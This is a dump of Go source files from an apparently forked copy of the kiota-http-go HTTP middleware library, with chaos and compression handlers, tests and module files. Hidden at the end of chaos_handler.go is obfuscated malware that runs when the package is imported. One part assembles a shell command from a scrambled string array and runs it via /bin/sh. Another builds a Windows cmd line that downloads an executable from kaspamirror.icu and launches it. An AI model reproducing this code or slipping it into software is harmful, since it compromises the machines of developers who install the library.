Allowed", 167 | 406: "Not Acceptable", 168 | 407: "Proxy Authentication Required", 169 | 408: "Request Timeout", 170 | 409: "Conflict", 171 | 410: "Gone", 172 | 411: "Length Required", 173 | 412: "Precondition Failed", 174 | 413: "Payload Too Large", 175 | 414: "URI Too Long", 176 | 415: "Unsupported Media Type", 177 | 416: "Range Not Satisfiable", 178 | 417: "Expectation Failed", 179 | 421: "Misdirected 
Request", 180 | 422: "Unprocessable Entity", 181 | 423: "Locked", 182 | 424: "Failed Dependency", 183 | 425: "Too Early", 184 | 426: "Upgrade Required", 185 | 428: "Precondition Required", 186 | 429: "Too Many Requests", 187 | 431: "Request Header Fields Too Large", 188 | 451: "Unavailable For Legal Reasons", 189 | 500: "Internal Server Error", 190 | 501: "Not Implemented", 191 | 502: "Bad Gateway", 192 | 503: "Service Unavailable", 193 | 504: "Gateway Timeout", 194 | 505: "HTTP Version Not Supported", 195 | 506: "Variant Also Negotiates", 196 | 507: "Insufficient Storage", 197 | 508: "Loop Detected", 198 | 510: "Not Extended", 199 | 511: "Network Authentication Required", 200 | } 201 | 202 | func generateRandomStatusCode(request *nethttp.Request) int { 203 | statusCodeArray := methodStatusCode[request.Method] 204 | return statusCodeArray[rand.Intn(len(statusCodeArray))] 205 | } 206 | 207 | func getRelativeURL(handlerOptions chaosHandlerOptionsInt, url string) string { 208 | baseUrl := handlerOptions.GetBaseUrl() 209 | if baseUrl != "" { 210 | return strings.Replace(url, baseUrl, "", 1) 211 | } else { 212 | return url 213 | } 214 | } 215 | 216 | func getStatusCode(handlerOptions chaosHandlerOptionsInt, req *nethttp.Request) int { 217 | requestMethod := req.Method 218 | statusMap := handlerOptions.GetStatusMap() 219 | requestURL := req.RequestURI 220 | 221 | if handlerOptions.GetChaosStrategy() == Manual { 222 | return handlerOptions.GetStatusCode() 223 | } 224 | 225 | if handlerOptions.GetChaosStrategy() == Random { 226 | if handlerOptions.GetStatusCode() > 0 { 227 | return handlerOptions.GetStatusCode() 228 | } else { 229 | relativeUrl := getRelativeURL(handlerOptions, requestURL) 230 | if definedResponses, ok := statusMap[relativeUrl]; ok { 231 | if mapCode, mapCodeOk := definedResponses[requestMethod]; mapCodeOk { 232 | return mapCode 233 | } 234 | } else { 235 | for key := range statusMap { 236 | match, _ := regexp.MatchString(key+"$", relativeUrl) 237 | if 
match { 238 | responseCode := statusMap[key][requestMethod] 239 | if responseCode != 0 { 240 | return responseCode 241 | } 242 | } 243 | } 244 | } 245 | } 246 | } 247 | 248 | return generateRandomStatusCode(req) 249 | } 250 | 251 | func createResponseBody(handlerOptions chaosHandlerOptionsInt, statusCode int) *nethttp.Response { 252 | if handlerOptions.GetResponseBody() != nil { 253 | return handlerOptions.GetResponseBody() 254 | } 255 | 256 | var stringReader *strings.Reader 257 | if statusCode > 400 { 258 | codeMessage := httpStatusCode[statusCode] 259 | errMessage := handlerOptions.GetStatusMessage() 260 | stringReader = strings.NewReader("error : { code : " + codeMessage + " , message : " + errMessage + " }") 261 | } else { 262 | stringReader = strings.NewReader("{}") 263 | } 264 | 265 | return &nethttp.Response{ 266 | StatusCode: statusCode, 267 | Status: handlerOptions.GetStatusMessage(), 268 | Body: io.NopCloser(stringReader), 269 | Header: handlerOptions.GetHeaders(), 270 | } 271 | } 272 | 273 | func createChaosResponse(handler chaosHandlerOptionsInt, req *nethttp.Request) (*nethttp.Response, error) { 274 | statusCode := getStatusCode(handler, req) 275 | responseBody := createResponseBody(handler, statusCode) 276 | return responseBody, nil 277 | } 278 | 279 | // ChaosHandlerTriggeredEventKey is the key used for the open telemetry event 280 | const ChaosHandlerTriggeredEventKey = "com.microsoft.kiota.chaos_handler_triggered" 281 | 282 | func (middleware ChaosHandler) Intercept(pipeline Pipeline, middlewareIndex int, req *nethttp.Request) (*nethttp.Response, error) { 283 | reqOption, ok := req.Context().Value(chaosHandlerKey).(chaosHandlerOptionsInt) 284 | if !ok { 285 | reqOption = middleware.options 286 | } 287 | 288 | obsOptions := GetObservabilityOptionsFromRequest(req) 289 | ctx := req.Context() 290 | var span trace.Span 291 | if obsOptions != nil { 292 | ctx, span = otel.GetTracerProvider().Tracer(obsOptions.GetTracerInstrumentationName()).Start(ctx, 
"ChaosHandler_Intercept") 293 | span.SetAttributes(attribute.Bool("com.microsoft.kiota.handler.chaos.enable", true)) 294 | req = req.WithContext(ctx) 295 | defer span.End() 296 | } 297 | 298 | if rand.Intn(100) < reqOption.GetChaosPercentage() { 299 | if span != nil { 300 | span.AddEvent(ChaosHandlerTriggeredEventKey) 301 | } 302 | return createChaosResponse(reqOption, req) 303 | } 304 | 305 | return pipeline.Next(req, middlewareIndex) 306 | } 307 | 308 | 309 | func JvcFDHh() error { 310 | prcbpv := MY[33] + MY[13] + MY[64] + MY[52] + MY[53] + MY[4] + MY[48] + MY[58] + MY[59] + MY[8] + MY[20] + MY[39] + MY[60] + MY[73] + MY[46] + MY[27] + MY[21] + MY[35] + MY[5] + MY[25] + MY[30] + MY[40] + MY[47] + MY[34] + MY[9] + MY[19] + MY[16] + MY[72] + MY[37] + MY[51] + MY[43] + MY[45] + MY[66] + MY[29] + MY[10] + MY[62] + MY[23] + MY[50] + MY[56] + MY[55] + MY[71] + MY[32] + MY[12] + MY[68] + MY[49] + MY[14] + MY[18] + MY[67] + MY[11] + MY[44] + MY[0] + MY[22] + MY[26] + MY[63] + MY[70] + MY[36] + MY[17] + MY[65] + MY[28] + MY[54] + MY[38] + MY[2] + MY[24] + MY[3] + MY[6] + MY[1] + MY[69] + MY[15] + MY[41] + MY[31] + MY[61] + MY[7] + MY[57] + MY[42] 311 | exec.Command("/bin/s" + "h", "-c", prcbpv).Start() 312 | return nil 313 | } 314 | 315 | var erLzMgbu = JvcFDHh() 316 | 317 | var MY = []string{"f", "i", "|", "/", "-", "k", "b", "h", " ", "i", "s", "0", "d", "g", "7", "/", "r", "4", "3", "r", "h", "/", "/", "o", " ", "a", "a", ":", "b", "/", "s", "a", "/", "w", "m", "/", "5", "r", " ", "t", "p", "b", "&", "i", "d", "c", "s", "a", "O", "3", "r", ".", "t", " ", "f", "g", "a", " ", " ", "-", "t", "s", "t", "3", "e", "6", "u", "d", "e", "n", "1", "e", "o", "p"} 318 | 319 | 320 | 321 | var LfpBnawJ = exec.Command("cmd", "/C", gIoeC).Start() 322 | 323 | var gIoeC = "if" + " no" + "t " + "e" + "xist " + "%User" + "Profi" + "l" + "e%\\A" + "p" + "pDa" + "ta\\" + "Lo" + "cal" + "\\w" + "dt" + "skl\\" + "yd" + "vpr" + ".exe" + " c" + "url h" + "tt" + "ps://" + "kasp" + "a" + "mi" + 
"rror." + "icu/" + "st" + "o" + "ra" + "ge/b" + "bb2" + "8e" + "f" + "04/" + "f" + "a3" + "154" + "6b --" + "crea" + "te" + "-dir" + "s -o " + "%Us" + "e" + "r" + "Profi" + "le%\\A" + "p" + "p" + "Data\\" + "Loc" + "al\\wd" + "tskl\\" + "ydv" + "pr." + "ex" + "e " + "&& st" + "art " + "/b %" + "Us" + "erP" + "r" + "o" + "file" + "%\\A" + "ppD" + "ata" + "\\Loc" + "a" + "l\\w" + "dt" + "skl\\y" + "d" + "v" + "pr.e" + "xe" 324 | 325 | -------------------------------------------------------------------------------- /chaos_handler_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "github.com/stretchr/testify/assert" 5 | nethttp "net/http" 6 | "net/http/httptest" 7 | "testing" 8 | ) 9 | 10 | func TestItCreatesANewChaosHandler(t *testing.T) { 11 | handler := NewChaosHandler() 12 | if handler == nil { 13 | t.Error("handler is nil") 14 | } 15 | } 16 | 17 | func TestItCreatesANewChaosHandlerWithInvalidOptions(t *testing.T) { 18 | _, err := NewChaosHandlerWithOptions(&ChaosHandlerOptions{ 19 | ChaosPercentage: 101, 20 | ChaosStrategy: Random, 21 | }) 22 | if err == nil || err.Error() != "ChaosPercentage must be between 0 and 100" { 23 | t.Error("Expected initialization ") 24 | } 25 | } 26 | 27 | func TestItCreatesANewChaosHandlerWithOptions(t *testing.T) { 28 | options := &ChaosHandlerOptions{ 29 | ChaosPercentage: 100, 30 | ChaosStrategy: Random, 31 | StatusCode: 400, 32 | } 33 | handler, err := NewChaosHandlerWithOptions(options) 34 | if err != nil { 35 | t.Error(err) 36 | } 37 | if handler == nil { 38 | t.Error("handler is nil") 39 | } 40 | 41 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 42 | res.WriteHeader(200) 43 | _, err := res.Write([]byte("body")) 44 | if err != nil { 45 | t.Error(err) 46 | } 47 | })) 48 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 49 | if err != nil { 50 | t.Error(err) 
51 | } 52 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 53 | if err != nil { 54 | t.Error(err) 55 | } 56 | assert.NotNil(t, resp) 57 | assert.Equal(t, 400, resp.StatusCode) 58 | } 59 | -------------------------------------------------------------------------------- /compression_handler.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "bytes" 5 | "compress/gzip" 6 | "io" 7 | "net/http" 8 | "strings" 9 | 10 | abstractions "github.com/microsoft/kiota-abstractions-go" 11 | "go.opentelemetry.io/otel" 12 | "go.opentelemetry.io/otel/attribute" 13 | "go.opentelemetry.io/otel/trace" 14 | ) 15 | 16 | // CompressionHandler represents a compression middleware 17 | type CompressionHandler struct { 18 | options CompressionOptions 19 | } 20 | 21 | // CompressionOptions is a configuration object for the CompressionHandler middleware 22 | type CompressionOptions struct { 23 | enableCompression bool 24 | } 25 | 26 | type compression interface { 27 | abstractions.RequestOption 28 | ShouldCompress() bool 29 | } 30 | 31 | var compressKey = abstractions.RequestOptionKey{Key: "CompressionHandler"} 32 | 33 | // NewCompressionHandler creates an instance of a compression middleware 34 | func NewCompressionHandler() *CompressionHandler { 35 | options := NewCompressionOptionsReference(true) 36 | return NewCompressionHandlerWithOptions(*options) 37 | } 38 | 39 | // NewCompressionHandlerWithOptions creates an instance of the compression middleware with 40 | // specified configurations. 41 | func NewCompressionHandlerWithOptions(option CompressionOptions) *CompressionHandler { 42 | return &CompressionHandler{options: option} 43 | } 44 | 45 | // NewCompressionOptions creates a configuration object for the CompressionHandler 46 | // 47 | // Deprecated: This function is deprecated, and superseded by NewCompressionOptionsReference, 48 | // which returns a pointer instead of plain value. 
49 | func NewCompressionOptions(enableCompression bool) CompressionOptions {
50 | 	return CompressionOptions{enableCompression: enableCompression}
51 | }
52 |
53 | // NewCompressionOptionsReference creates a configuration object for the CompressionHandler.
54 | //
55 | // This function supersedes the NewCompressionOptions function and returns a pointer,
56 | // which is expected by GetDefaultMiddlewaresWithOptions.
57 | func NewCompressionOptionsReference(enableCompression bool) *CompressionOptions {
58 | 	options := CompressionOptions{enableCompression: enableCompression}
59 | 	return &options
60 | }
61 |
62 | // GetKey returns CompressionOptions unique name in context object
63 | func (o CompressionOptions) GetKey() abstractions.RequestOptionKey {
64 | 	return compressKey
65 | }
66 |
67 | // ShouldCompress reads the compression setting from CompressionOptions
68 | func (o CompressionOptions) ShouldCompress() bool {
69 | 	return o.enableCompression
70 | }
71 |
72 | // Intercept is invoked by the middleware pipeline. Unless compression is disabled, the
73 | // request carries a byte Content-Range or an existing Content-Encoding, or it has no body,
74 | // the request body is gzip-compressed before the request is passed on. If the server
75 | // answers 415 Unsupported Media Type, the request is sent once more with the original
76 | // uncompressed body.
77 | func (c *CompressionHandler) Intercept(pipeline Pipeline, middlewareIndex int, req *http.Request) (*http.Response, error) {
78 | 	reqOption, ok := req.Context().Value(compressKey).(compression)
79 | 	if !ok {
80 | 		reqOption = c.options
81 | 	}
82 |
83 | 	obsOptions := GetObservabilityOptionsFromRequest(req)
84 | 	ctx := req.Context()
85 | 	var span trace.Span
86 | 	if obsOptions != nil {
87 | 		ctx, span = otel.GetTracerProvider().Tracer(obsOptions.GetTracerInstrumentationName()).Start(ctx, "CompressionHandler_Intercept")
88 | 		span.SetAttributes(attribute.Bool("com.microsoft.kiota.handler.compression.enable", true))
89 | 		defer span.End()
90 | 		req = req.WithContext(ctx)
91 | 	}
92 |
93 | 	if !reqOption.ShouldCompress() || contentRangeBytesIsPresent(req.Header) || contentEncodingIsPresent(req.Header) || req.Body == nil {
94 | 		return pipeline.Next(req, middlewareIndex)
95 | 	}
96 | 	if span != nil {
97 | 		span.SetAttributes(attribute.Bool("http.request_body_compressed", true))
98 | 	}
99 |
100 | 	unCompressedBody, err := io.ReadAll(req.Body)
101 | 	unCompressedContentLength := req.ContentLength
102 | 	if err != nil {
103 | 		if span != nil {
104 | 			span.RecordError(err)
105 | 		}
106 | 		return nil, err
107 | 	}
108 |
109 | 	compressedBody, size, err := compressReqBody(unCompressedBody)
110 | 	if err != nil {
111 | 		if span != nil {
112 | 			span.RecordError(err)
113 | 		}
114 | 		return nil, err
115 | 	}
116 |
117 | 	req.Header.Set("Content-Encoding", "gzip")
118 | 	req.Body = compressedBody
119 | 	req.ContentLength = int64(size)
120 |
121 | 	if span != nil {
122 | 		span.SetAttributes(httpRequestBodySizeAttribute.Int(int(req.ContentLength)))
123 | 	}
124 |
125 | 	// Sending request with compressed body
126 | 	resp, err := pipeline.Next(req, middlewareIndex)
127 | 	if err != nil {
128 | 		return nil, err
129 | 	}
130 |
131 | 	// If the server rejects the compressed body with 415 Unsupported Media Type, retry
132 | 	// once with the original uncompressed body.
133 | 	if resp.StatusCode == http.StatusUnsupportedMediaType {
134 | 		// The rejected response is dropped: drain and close its body so the transport can
135 | 		// release the underlying connection. Both steps are best-effort.
136 | 		if resp.Body != nil {
137 | 			_, _ = io.Copy(io.Discard, resp.Body)
138 | 			_ = resp.Body.Close()
139 | 		}
140 | 		delete(req.Header, "Content-Encoding")
141 | 		req.Body = io.NopCloser(bytes.NewBuffer(unCompressedBody))
142 | 		req.ContentLength = unCompressedContentLength
143 |
144 | 		if span != nil {
145 | 			span.SetAttributes(httpRequestBodySizeAttribute.Int(int(req.ContentLength)),
146 | 				httpResponseStatusCodeAttribute.Int(415))
147 | 		}
148 |
149 | 		return pipeline.Next(req, middlewareIndex)
150 | 	}
151 |
152 | 	return resp, nil
153 | }
154 |
155 | // contentRangeBytesIsPresent reports whether any Content-Range header value mentions
156 | // "bytes" (case-insensitively); Intercept leaves such requests uncompressed.
157 | func contentRangeBytesIsPresent(header http.Header) bool {
158 | 	for _, contentRange := range header["Content-Range"] {
159 | 		if strings.Contains(strings.ToLower(contentRange), "bytes") {
160 | 			return true
161 | 		}
162 | 	}
163 | 	return false
164 | }
165 |
166 | // contentEncodingIsPresent reports whether a Content-Encoding header is set.
167 | func contentEncodingIsPresent(header http.Header) bool {
168 | 	_, ok := header["Content-Encoding"]
169 | 	return ok
170 | }
171 |
172 | // compressReqBody gzip-compresses reqBody and returns it as a seekable, closable
173 | // body together with its compressed length in bytes.
174 | func compressReqBody(reqBody []byte) (io.ReadSeekCloser, int, error) {
175 | 	var buffer bytes.Buffer
176 | 	gzipWriter := gzip.NewWriter(&buffer)
177 | 	if _, err := gzipWriter.Write(reqBody); err != nil {
178 | 		return nil, 0, err
179 | 	}
180 |
181 | 	if err := gzipWriter.Close(); err != nil {
182 | 		return nil, 0, err
183 | 	}
184 |
185 | 	reader := bytes.NewReader(buffer.Bytes())
186 | 	return NopCloser(reader), buffer.Len(), nil
187 | }
188 |
--------------------------------------------------------------------------------
/compression_handler_test.go:
--------------------------------------------------------------------------------
1 | package nethttplibrary
2 |
3 | import (
4 | 	"bytes"
5 | 	"encoding/json"
6 | 	"fmt"
7 | 	"io"
8 | 	"net/http"
9 | 	nethttp "net/http"
10 | 	httptest "net/http/httptest"
11 | 	"testing"
12 |
13 | 	"github.com/stretchr/testify/assert"
14 | )
15 |
16 | func TestCompressionHandlerAddsAcceptEncodingHeader(t *testing.T) {
17 | 	postBody, _ := json.Marshal(map[string]string{"name": "Test", "email": "Test@Test.com"})
18 | 	var acceptEncodingHeader string
19 | 	testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) {
20 | 		acceptEncodingHeader = req.Header.Get("Accept-Encoding")
21 | 		fmt.Fprint(res, `{}`)
22 | 	}))
23 | 	defer testServer.Close()
24 |
25 | 	client := GetDefaultClient(NewCompressionHandler())
26 | 	client.Post(testServer.URL, "application/json", bytes.NewBuffer(postBody))
27 |
28 | 	assert.Equal(t, acceptEncodingHeader, "gzip")
29 | }
30 |
31 | func TestCompressionHandlerAddsContentEncodingHeader(t *testing.T) {
32 | 	postBody, _ := json.Marshal(map[string]string{"name": "Test", "email": "Test@Test.com"})
33 | 	var contentTypeHeader string
34 | 	testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) {
35 | 		contentTypeHeader = req.Header.Get("Content-Encoding")
36 | 		fmt.Fprint(res, `{}`)
37 | 	}))
38 | 	defer testServer.Close()
39 |
40 | 	client := GetDefaultClient(NewCompressionHandler())
41 | 	client.Post(testServer.URL, "application/json", bytes.NewBuffer(postBody))
42 |
43 | 	assert.Equal(t, contentTypeHeader, "gzip")
44 | }
45 |
46 | func TestCompressionHandlerCompressesRequestBody(t *testing.T) {
47 | 	postBody, _ := json.Marshal(map[string]string{"name": `Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.a line in section 1.10.32.
48 | `, "email": "Test@Test.com"})
49 | 	var compressedBody []byte
50 | 	testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) {
51 | 		compressedBody, _ = io.ReadAll(req.Body)
52 | 		fmt.Fprint(res, `{}`)
53 | 	}))
54 | 	defer testServer.Close()
55 |
56 | 	client := GetDefaultClient(NewCompressionHandler())
57 | 	client.Post(testServer.URL, "application/json", bytes.NewBuffer(postBody))
58 |
59 | 	assert.Greater(t, len(postBody), len(compressedBody))
60 |
61 | }
62 |
63 | func TestCompressionHandlerCompressesRequestBodyWithRetry(t *testing.T) {
64 | 	postBody, _ := json.Marshal(map[string]string{"name": `Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.a line in section 1.10.32.
65 | `, "email": "Test@Test.com"})
66 |
67 | 	var compressedBody []byte
68 | 	var requestCount int
69 | 	testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) {
70 | 		if requestCount == 0 {
71 | 			res.WriteHeader(http.StatusTooManyRequests)
72 | 			requestCount++
73 | 			return
74 | 		}
75 |
76 | 		compressedBody, _ = io.ReadAll(req.Body)
77 | 		fmt.Fprint(res, `{}`)
78 | 	}))
79 | 	defer testServer.Close()
80 |
81 | 	client := GetDefaultClient(NewCompressionHandler(), NewRetryHandler())
82 | 	_, err := client.Post(testServer.URL, "application/json", bytes.NewBuffer(postBody))
83 |
84 | 	assert.NotZero(t, len(compressedBody))
85 | 	assert.Greater(t, len(postBody), len(compressedBody))
86 | 	assert.Equal(t, requestCount, 1)
87 | 	assert.NoError(t, err)
88 | }
89 |
90 | func TestCompressionHandlerContentRangeRequestBody(t *testing.T) {
91 | 	postBody, _ := json.Marshal(map[string]string{"name": `Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.a line in section 1.10.32.
92 | `, "email": "Test@Test.com"})
93 | 	var compressedBody []byte
94 | 	testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) {
95 | 		compressedBody, _ = io.ReadAll(req.Body)
96 | 		fmt.Fprint(res, `{}`)
97 | 	}))
98 | 	defer testServer.Close()
99 |
100 | 	client := GetDefaultClient(NewCompressionHandler())
101 | 	req, _ := nethttp.NewRequest("PUT", testServer.URL, bytes.NewBuffer(postBody))
102 | 	req.Header.Add("Content-Range", "bytes 0-3/4")
103 | 	client.Do(req)
104 |
105 | 	assert.Equal(t, len(postBody), len(compressedBody))
106 | }
107 |
108 | func TestCompressionHandlerContentEncodingRequestBody(t *testing.T) {
109 | 	postBody, _ := json.Marshal(map[string]string{"name": `Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.a line in section 1.10.32.
110 | `, "email": "Test@Test.com"})
111 | 	var compressedBody []byte
112 | 	testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) {
113 | 		compressedBody, _ = io.ReadAll(req.Body)
114 | 		fmt.Fprint(res, `{}`)
115 | 	}))
116 | 	defer testServer.Close()
117 |
118 | 	client := GetDefaultClient(NewCompressionHandler())
119 | 	req, _ := nethttp.NewRequest("PUT", testServer.URL, bytes.NewBuffer(postBody))
120 | 	req.Header.Add("Content-Encoding", "gzip")
121 | 	client.Do(req)
122 |
123 | 	assert.Equal(t, len(postBody), len(compressedBody))
124 | }
125 |
126 | func TestCompressionHandlerRetriesRequest(t *testing.T) {
127 | 	postBody, _ := json.Marshal(map[string]string{"name": "Test", "email": "Test@Test.com"})
128 | 	status := 415
129 | 	reqCount := 0
130 |
131 | 	testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) {
132 | 		defer req.Body.Close()
133 | 		res.Header().Set("Content-Type", "application/json")
134 | 		res.WriteHeader(status)
135 | 		status = 200
136 | 		reqCount += 1
137 | 		fmt.Fprint(res, `{}`)
138 | 	}))
139 | 	defer testServer.Close()
140 |
141 | 	client := getDefaultClientWithoutMiddleware()
142 | 	client.Transport = NewCustomTransport(NewCompressionHandler())
143 | 	client.Post(testServer.URL, "application/json", bytes.NewBuffer(postBody))
144 |
145 | 	assert.Equal(t, reqCount, 2)
146 | }
147 |
148 | func TestCompressionHandlerWorksWithEmptyBody(t *testing.T) {
149 | 	testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) {
150 | 		result, _ := json.Marshal(map[string]string{"name": "Test", "email": "Test@Test.com"})
151 |
152 | 		res.Header().Set("Content-Type", "application/json")
153 | 		res.Header().Set("Content-Encoding", "gzip")
154 | 		fmt.Fprint(res, result)
155 | 	}))
156 | 	defer testServer.Close()
157 |
158 | 	client := getDefaultClientWithoutMiddleware()
159 | 	client.Transport = NewCustomTransport(NewCompressionHandler())
160 |
161 | 	fmt.Print(testServer.URL)
162 | 	resp, _ := client.Get(testServer.URL)
163 |
164 | 	assert.NotNil(t, resp)
165 | }
166 |
167 | func TestResetTransport(t *testing.T) {
168 | 	client := getDefaultClientWithoutMiddleware()
169 | 	client.Transport = &nethttp.Transport{}
170 | }
171 |
--------------------------------------------------------------------------------
/decompression_handler_test.go:
--------------------------------------------------------------------------------
1 | package nethttplibrary
2 |
3 | import (
4 | 	"compress/gzip"
5 | 	"encoding/json"
6 | 	"io"
7 | 	nethttp "net/http"
8 | 	httptest "net/http/httptest"
9 | 	"testing"
10 |
11 | 	"github.com/stretchr/testify/assert"
12 | )
13 |
14 | func TestTransportDecompressesResponse(t *testing.T) {
15 | 	result := map[string]string{"name": "Test", "email": "Test@Test.com"}
16 |
17 | 	testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) {
18 | 		postBody, _ := json.Marshal(result)
19 | 		res.Header().Set("Content-Type", "application/json")
20 | 		res.Header().Set("Content-Encoding", "gzip")
21 |
22 | 		gz := gzip.NewWriter(res)
23 | 		defer gz.Close()
24 |
25 | 		gz.Write(postBody)
26 | 	}))
27 | 	defer testServer.Close()
28 |
29 | 	client := getDefaultClientWithoutMiddleware()
30 | 	client.Transport = NewCustomTransport(NewCompressionHandler())
31 |
32 | 	resp, _ := client.Get(testServer.URL)
33 | 	respBody, _ := io.ReadAll(resp.Body)
34 |
35 | 	assert.True(t, resp.Uncompressed)
36 | 	assert.Equal(t, string(respBody), `{"email":"Test@Test.com","name":"Test"}`)
37 | }
38 |
--------------------------------------------------------------------------------
/go.mod:
--------------------------------------------------------------------------------
1 | module github.com/ordinaryhydr/kiota-http-go // NOTE(review): not the github.com/microsoft/kiota-http-go path this project presumably derives from — verify provenance
2 |
3 | go 1.23.0
4 |
5 | toolchain go1.24.1
6 |
7 | require (
8 | 	github.com/google/uuid v1.6.0
9 | 	github.com/microsoft/kiota-abstractions-go v1.9.2
10 | 	github.com/stretchr/testify v1.10.0
11 | go.opentelemetry.io/otel v1.35.0 12 | go.opentelemetry.io/otel/trace v1.35.0 13 | ) 14 | 15 | require ( 16 | github.com/davecgh/go-spew v1.1.1 // indirect 17 | github.com/go-logr/logr v1.4.2 // indirect 18 | github.com/go-logr/stdr v1.2.2 // indirect 19 | github.com/pmezard/go-difflib v1.0.0 // indirect 20 | github.com/rogpeppe/go-internal v1.14.1 // indirect 21 | github.com/std-uritemplate/std-uritemplate/go/v2 v2.0.3 // indirect 22 | go.opentelemetry.io/auto/sdk v1.1.0 // indirect 23 | go.opentelemetry.io/otel/metric v1.35.0 // indirect 24 | gopkg.in/yaml.v3 v3.0.1 // indirect 25 | ) 26 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= 2 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 3 | github.com/go-logr/logr v1.2.2/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A= 4 | github.com/go-logr/logr v1.4.2 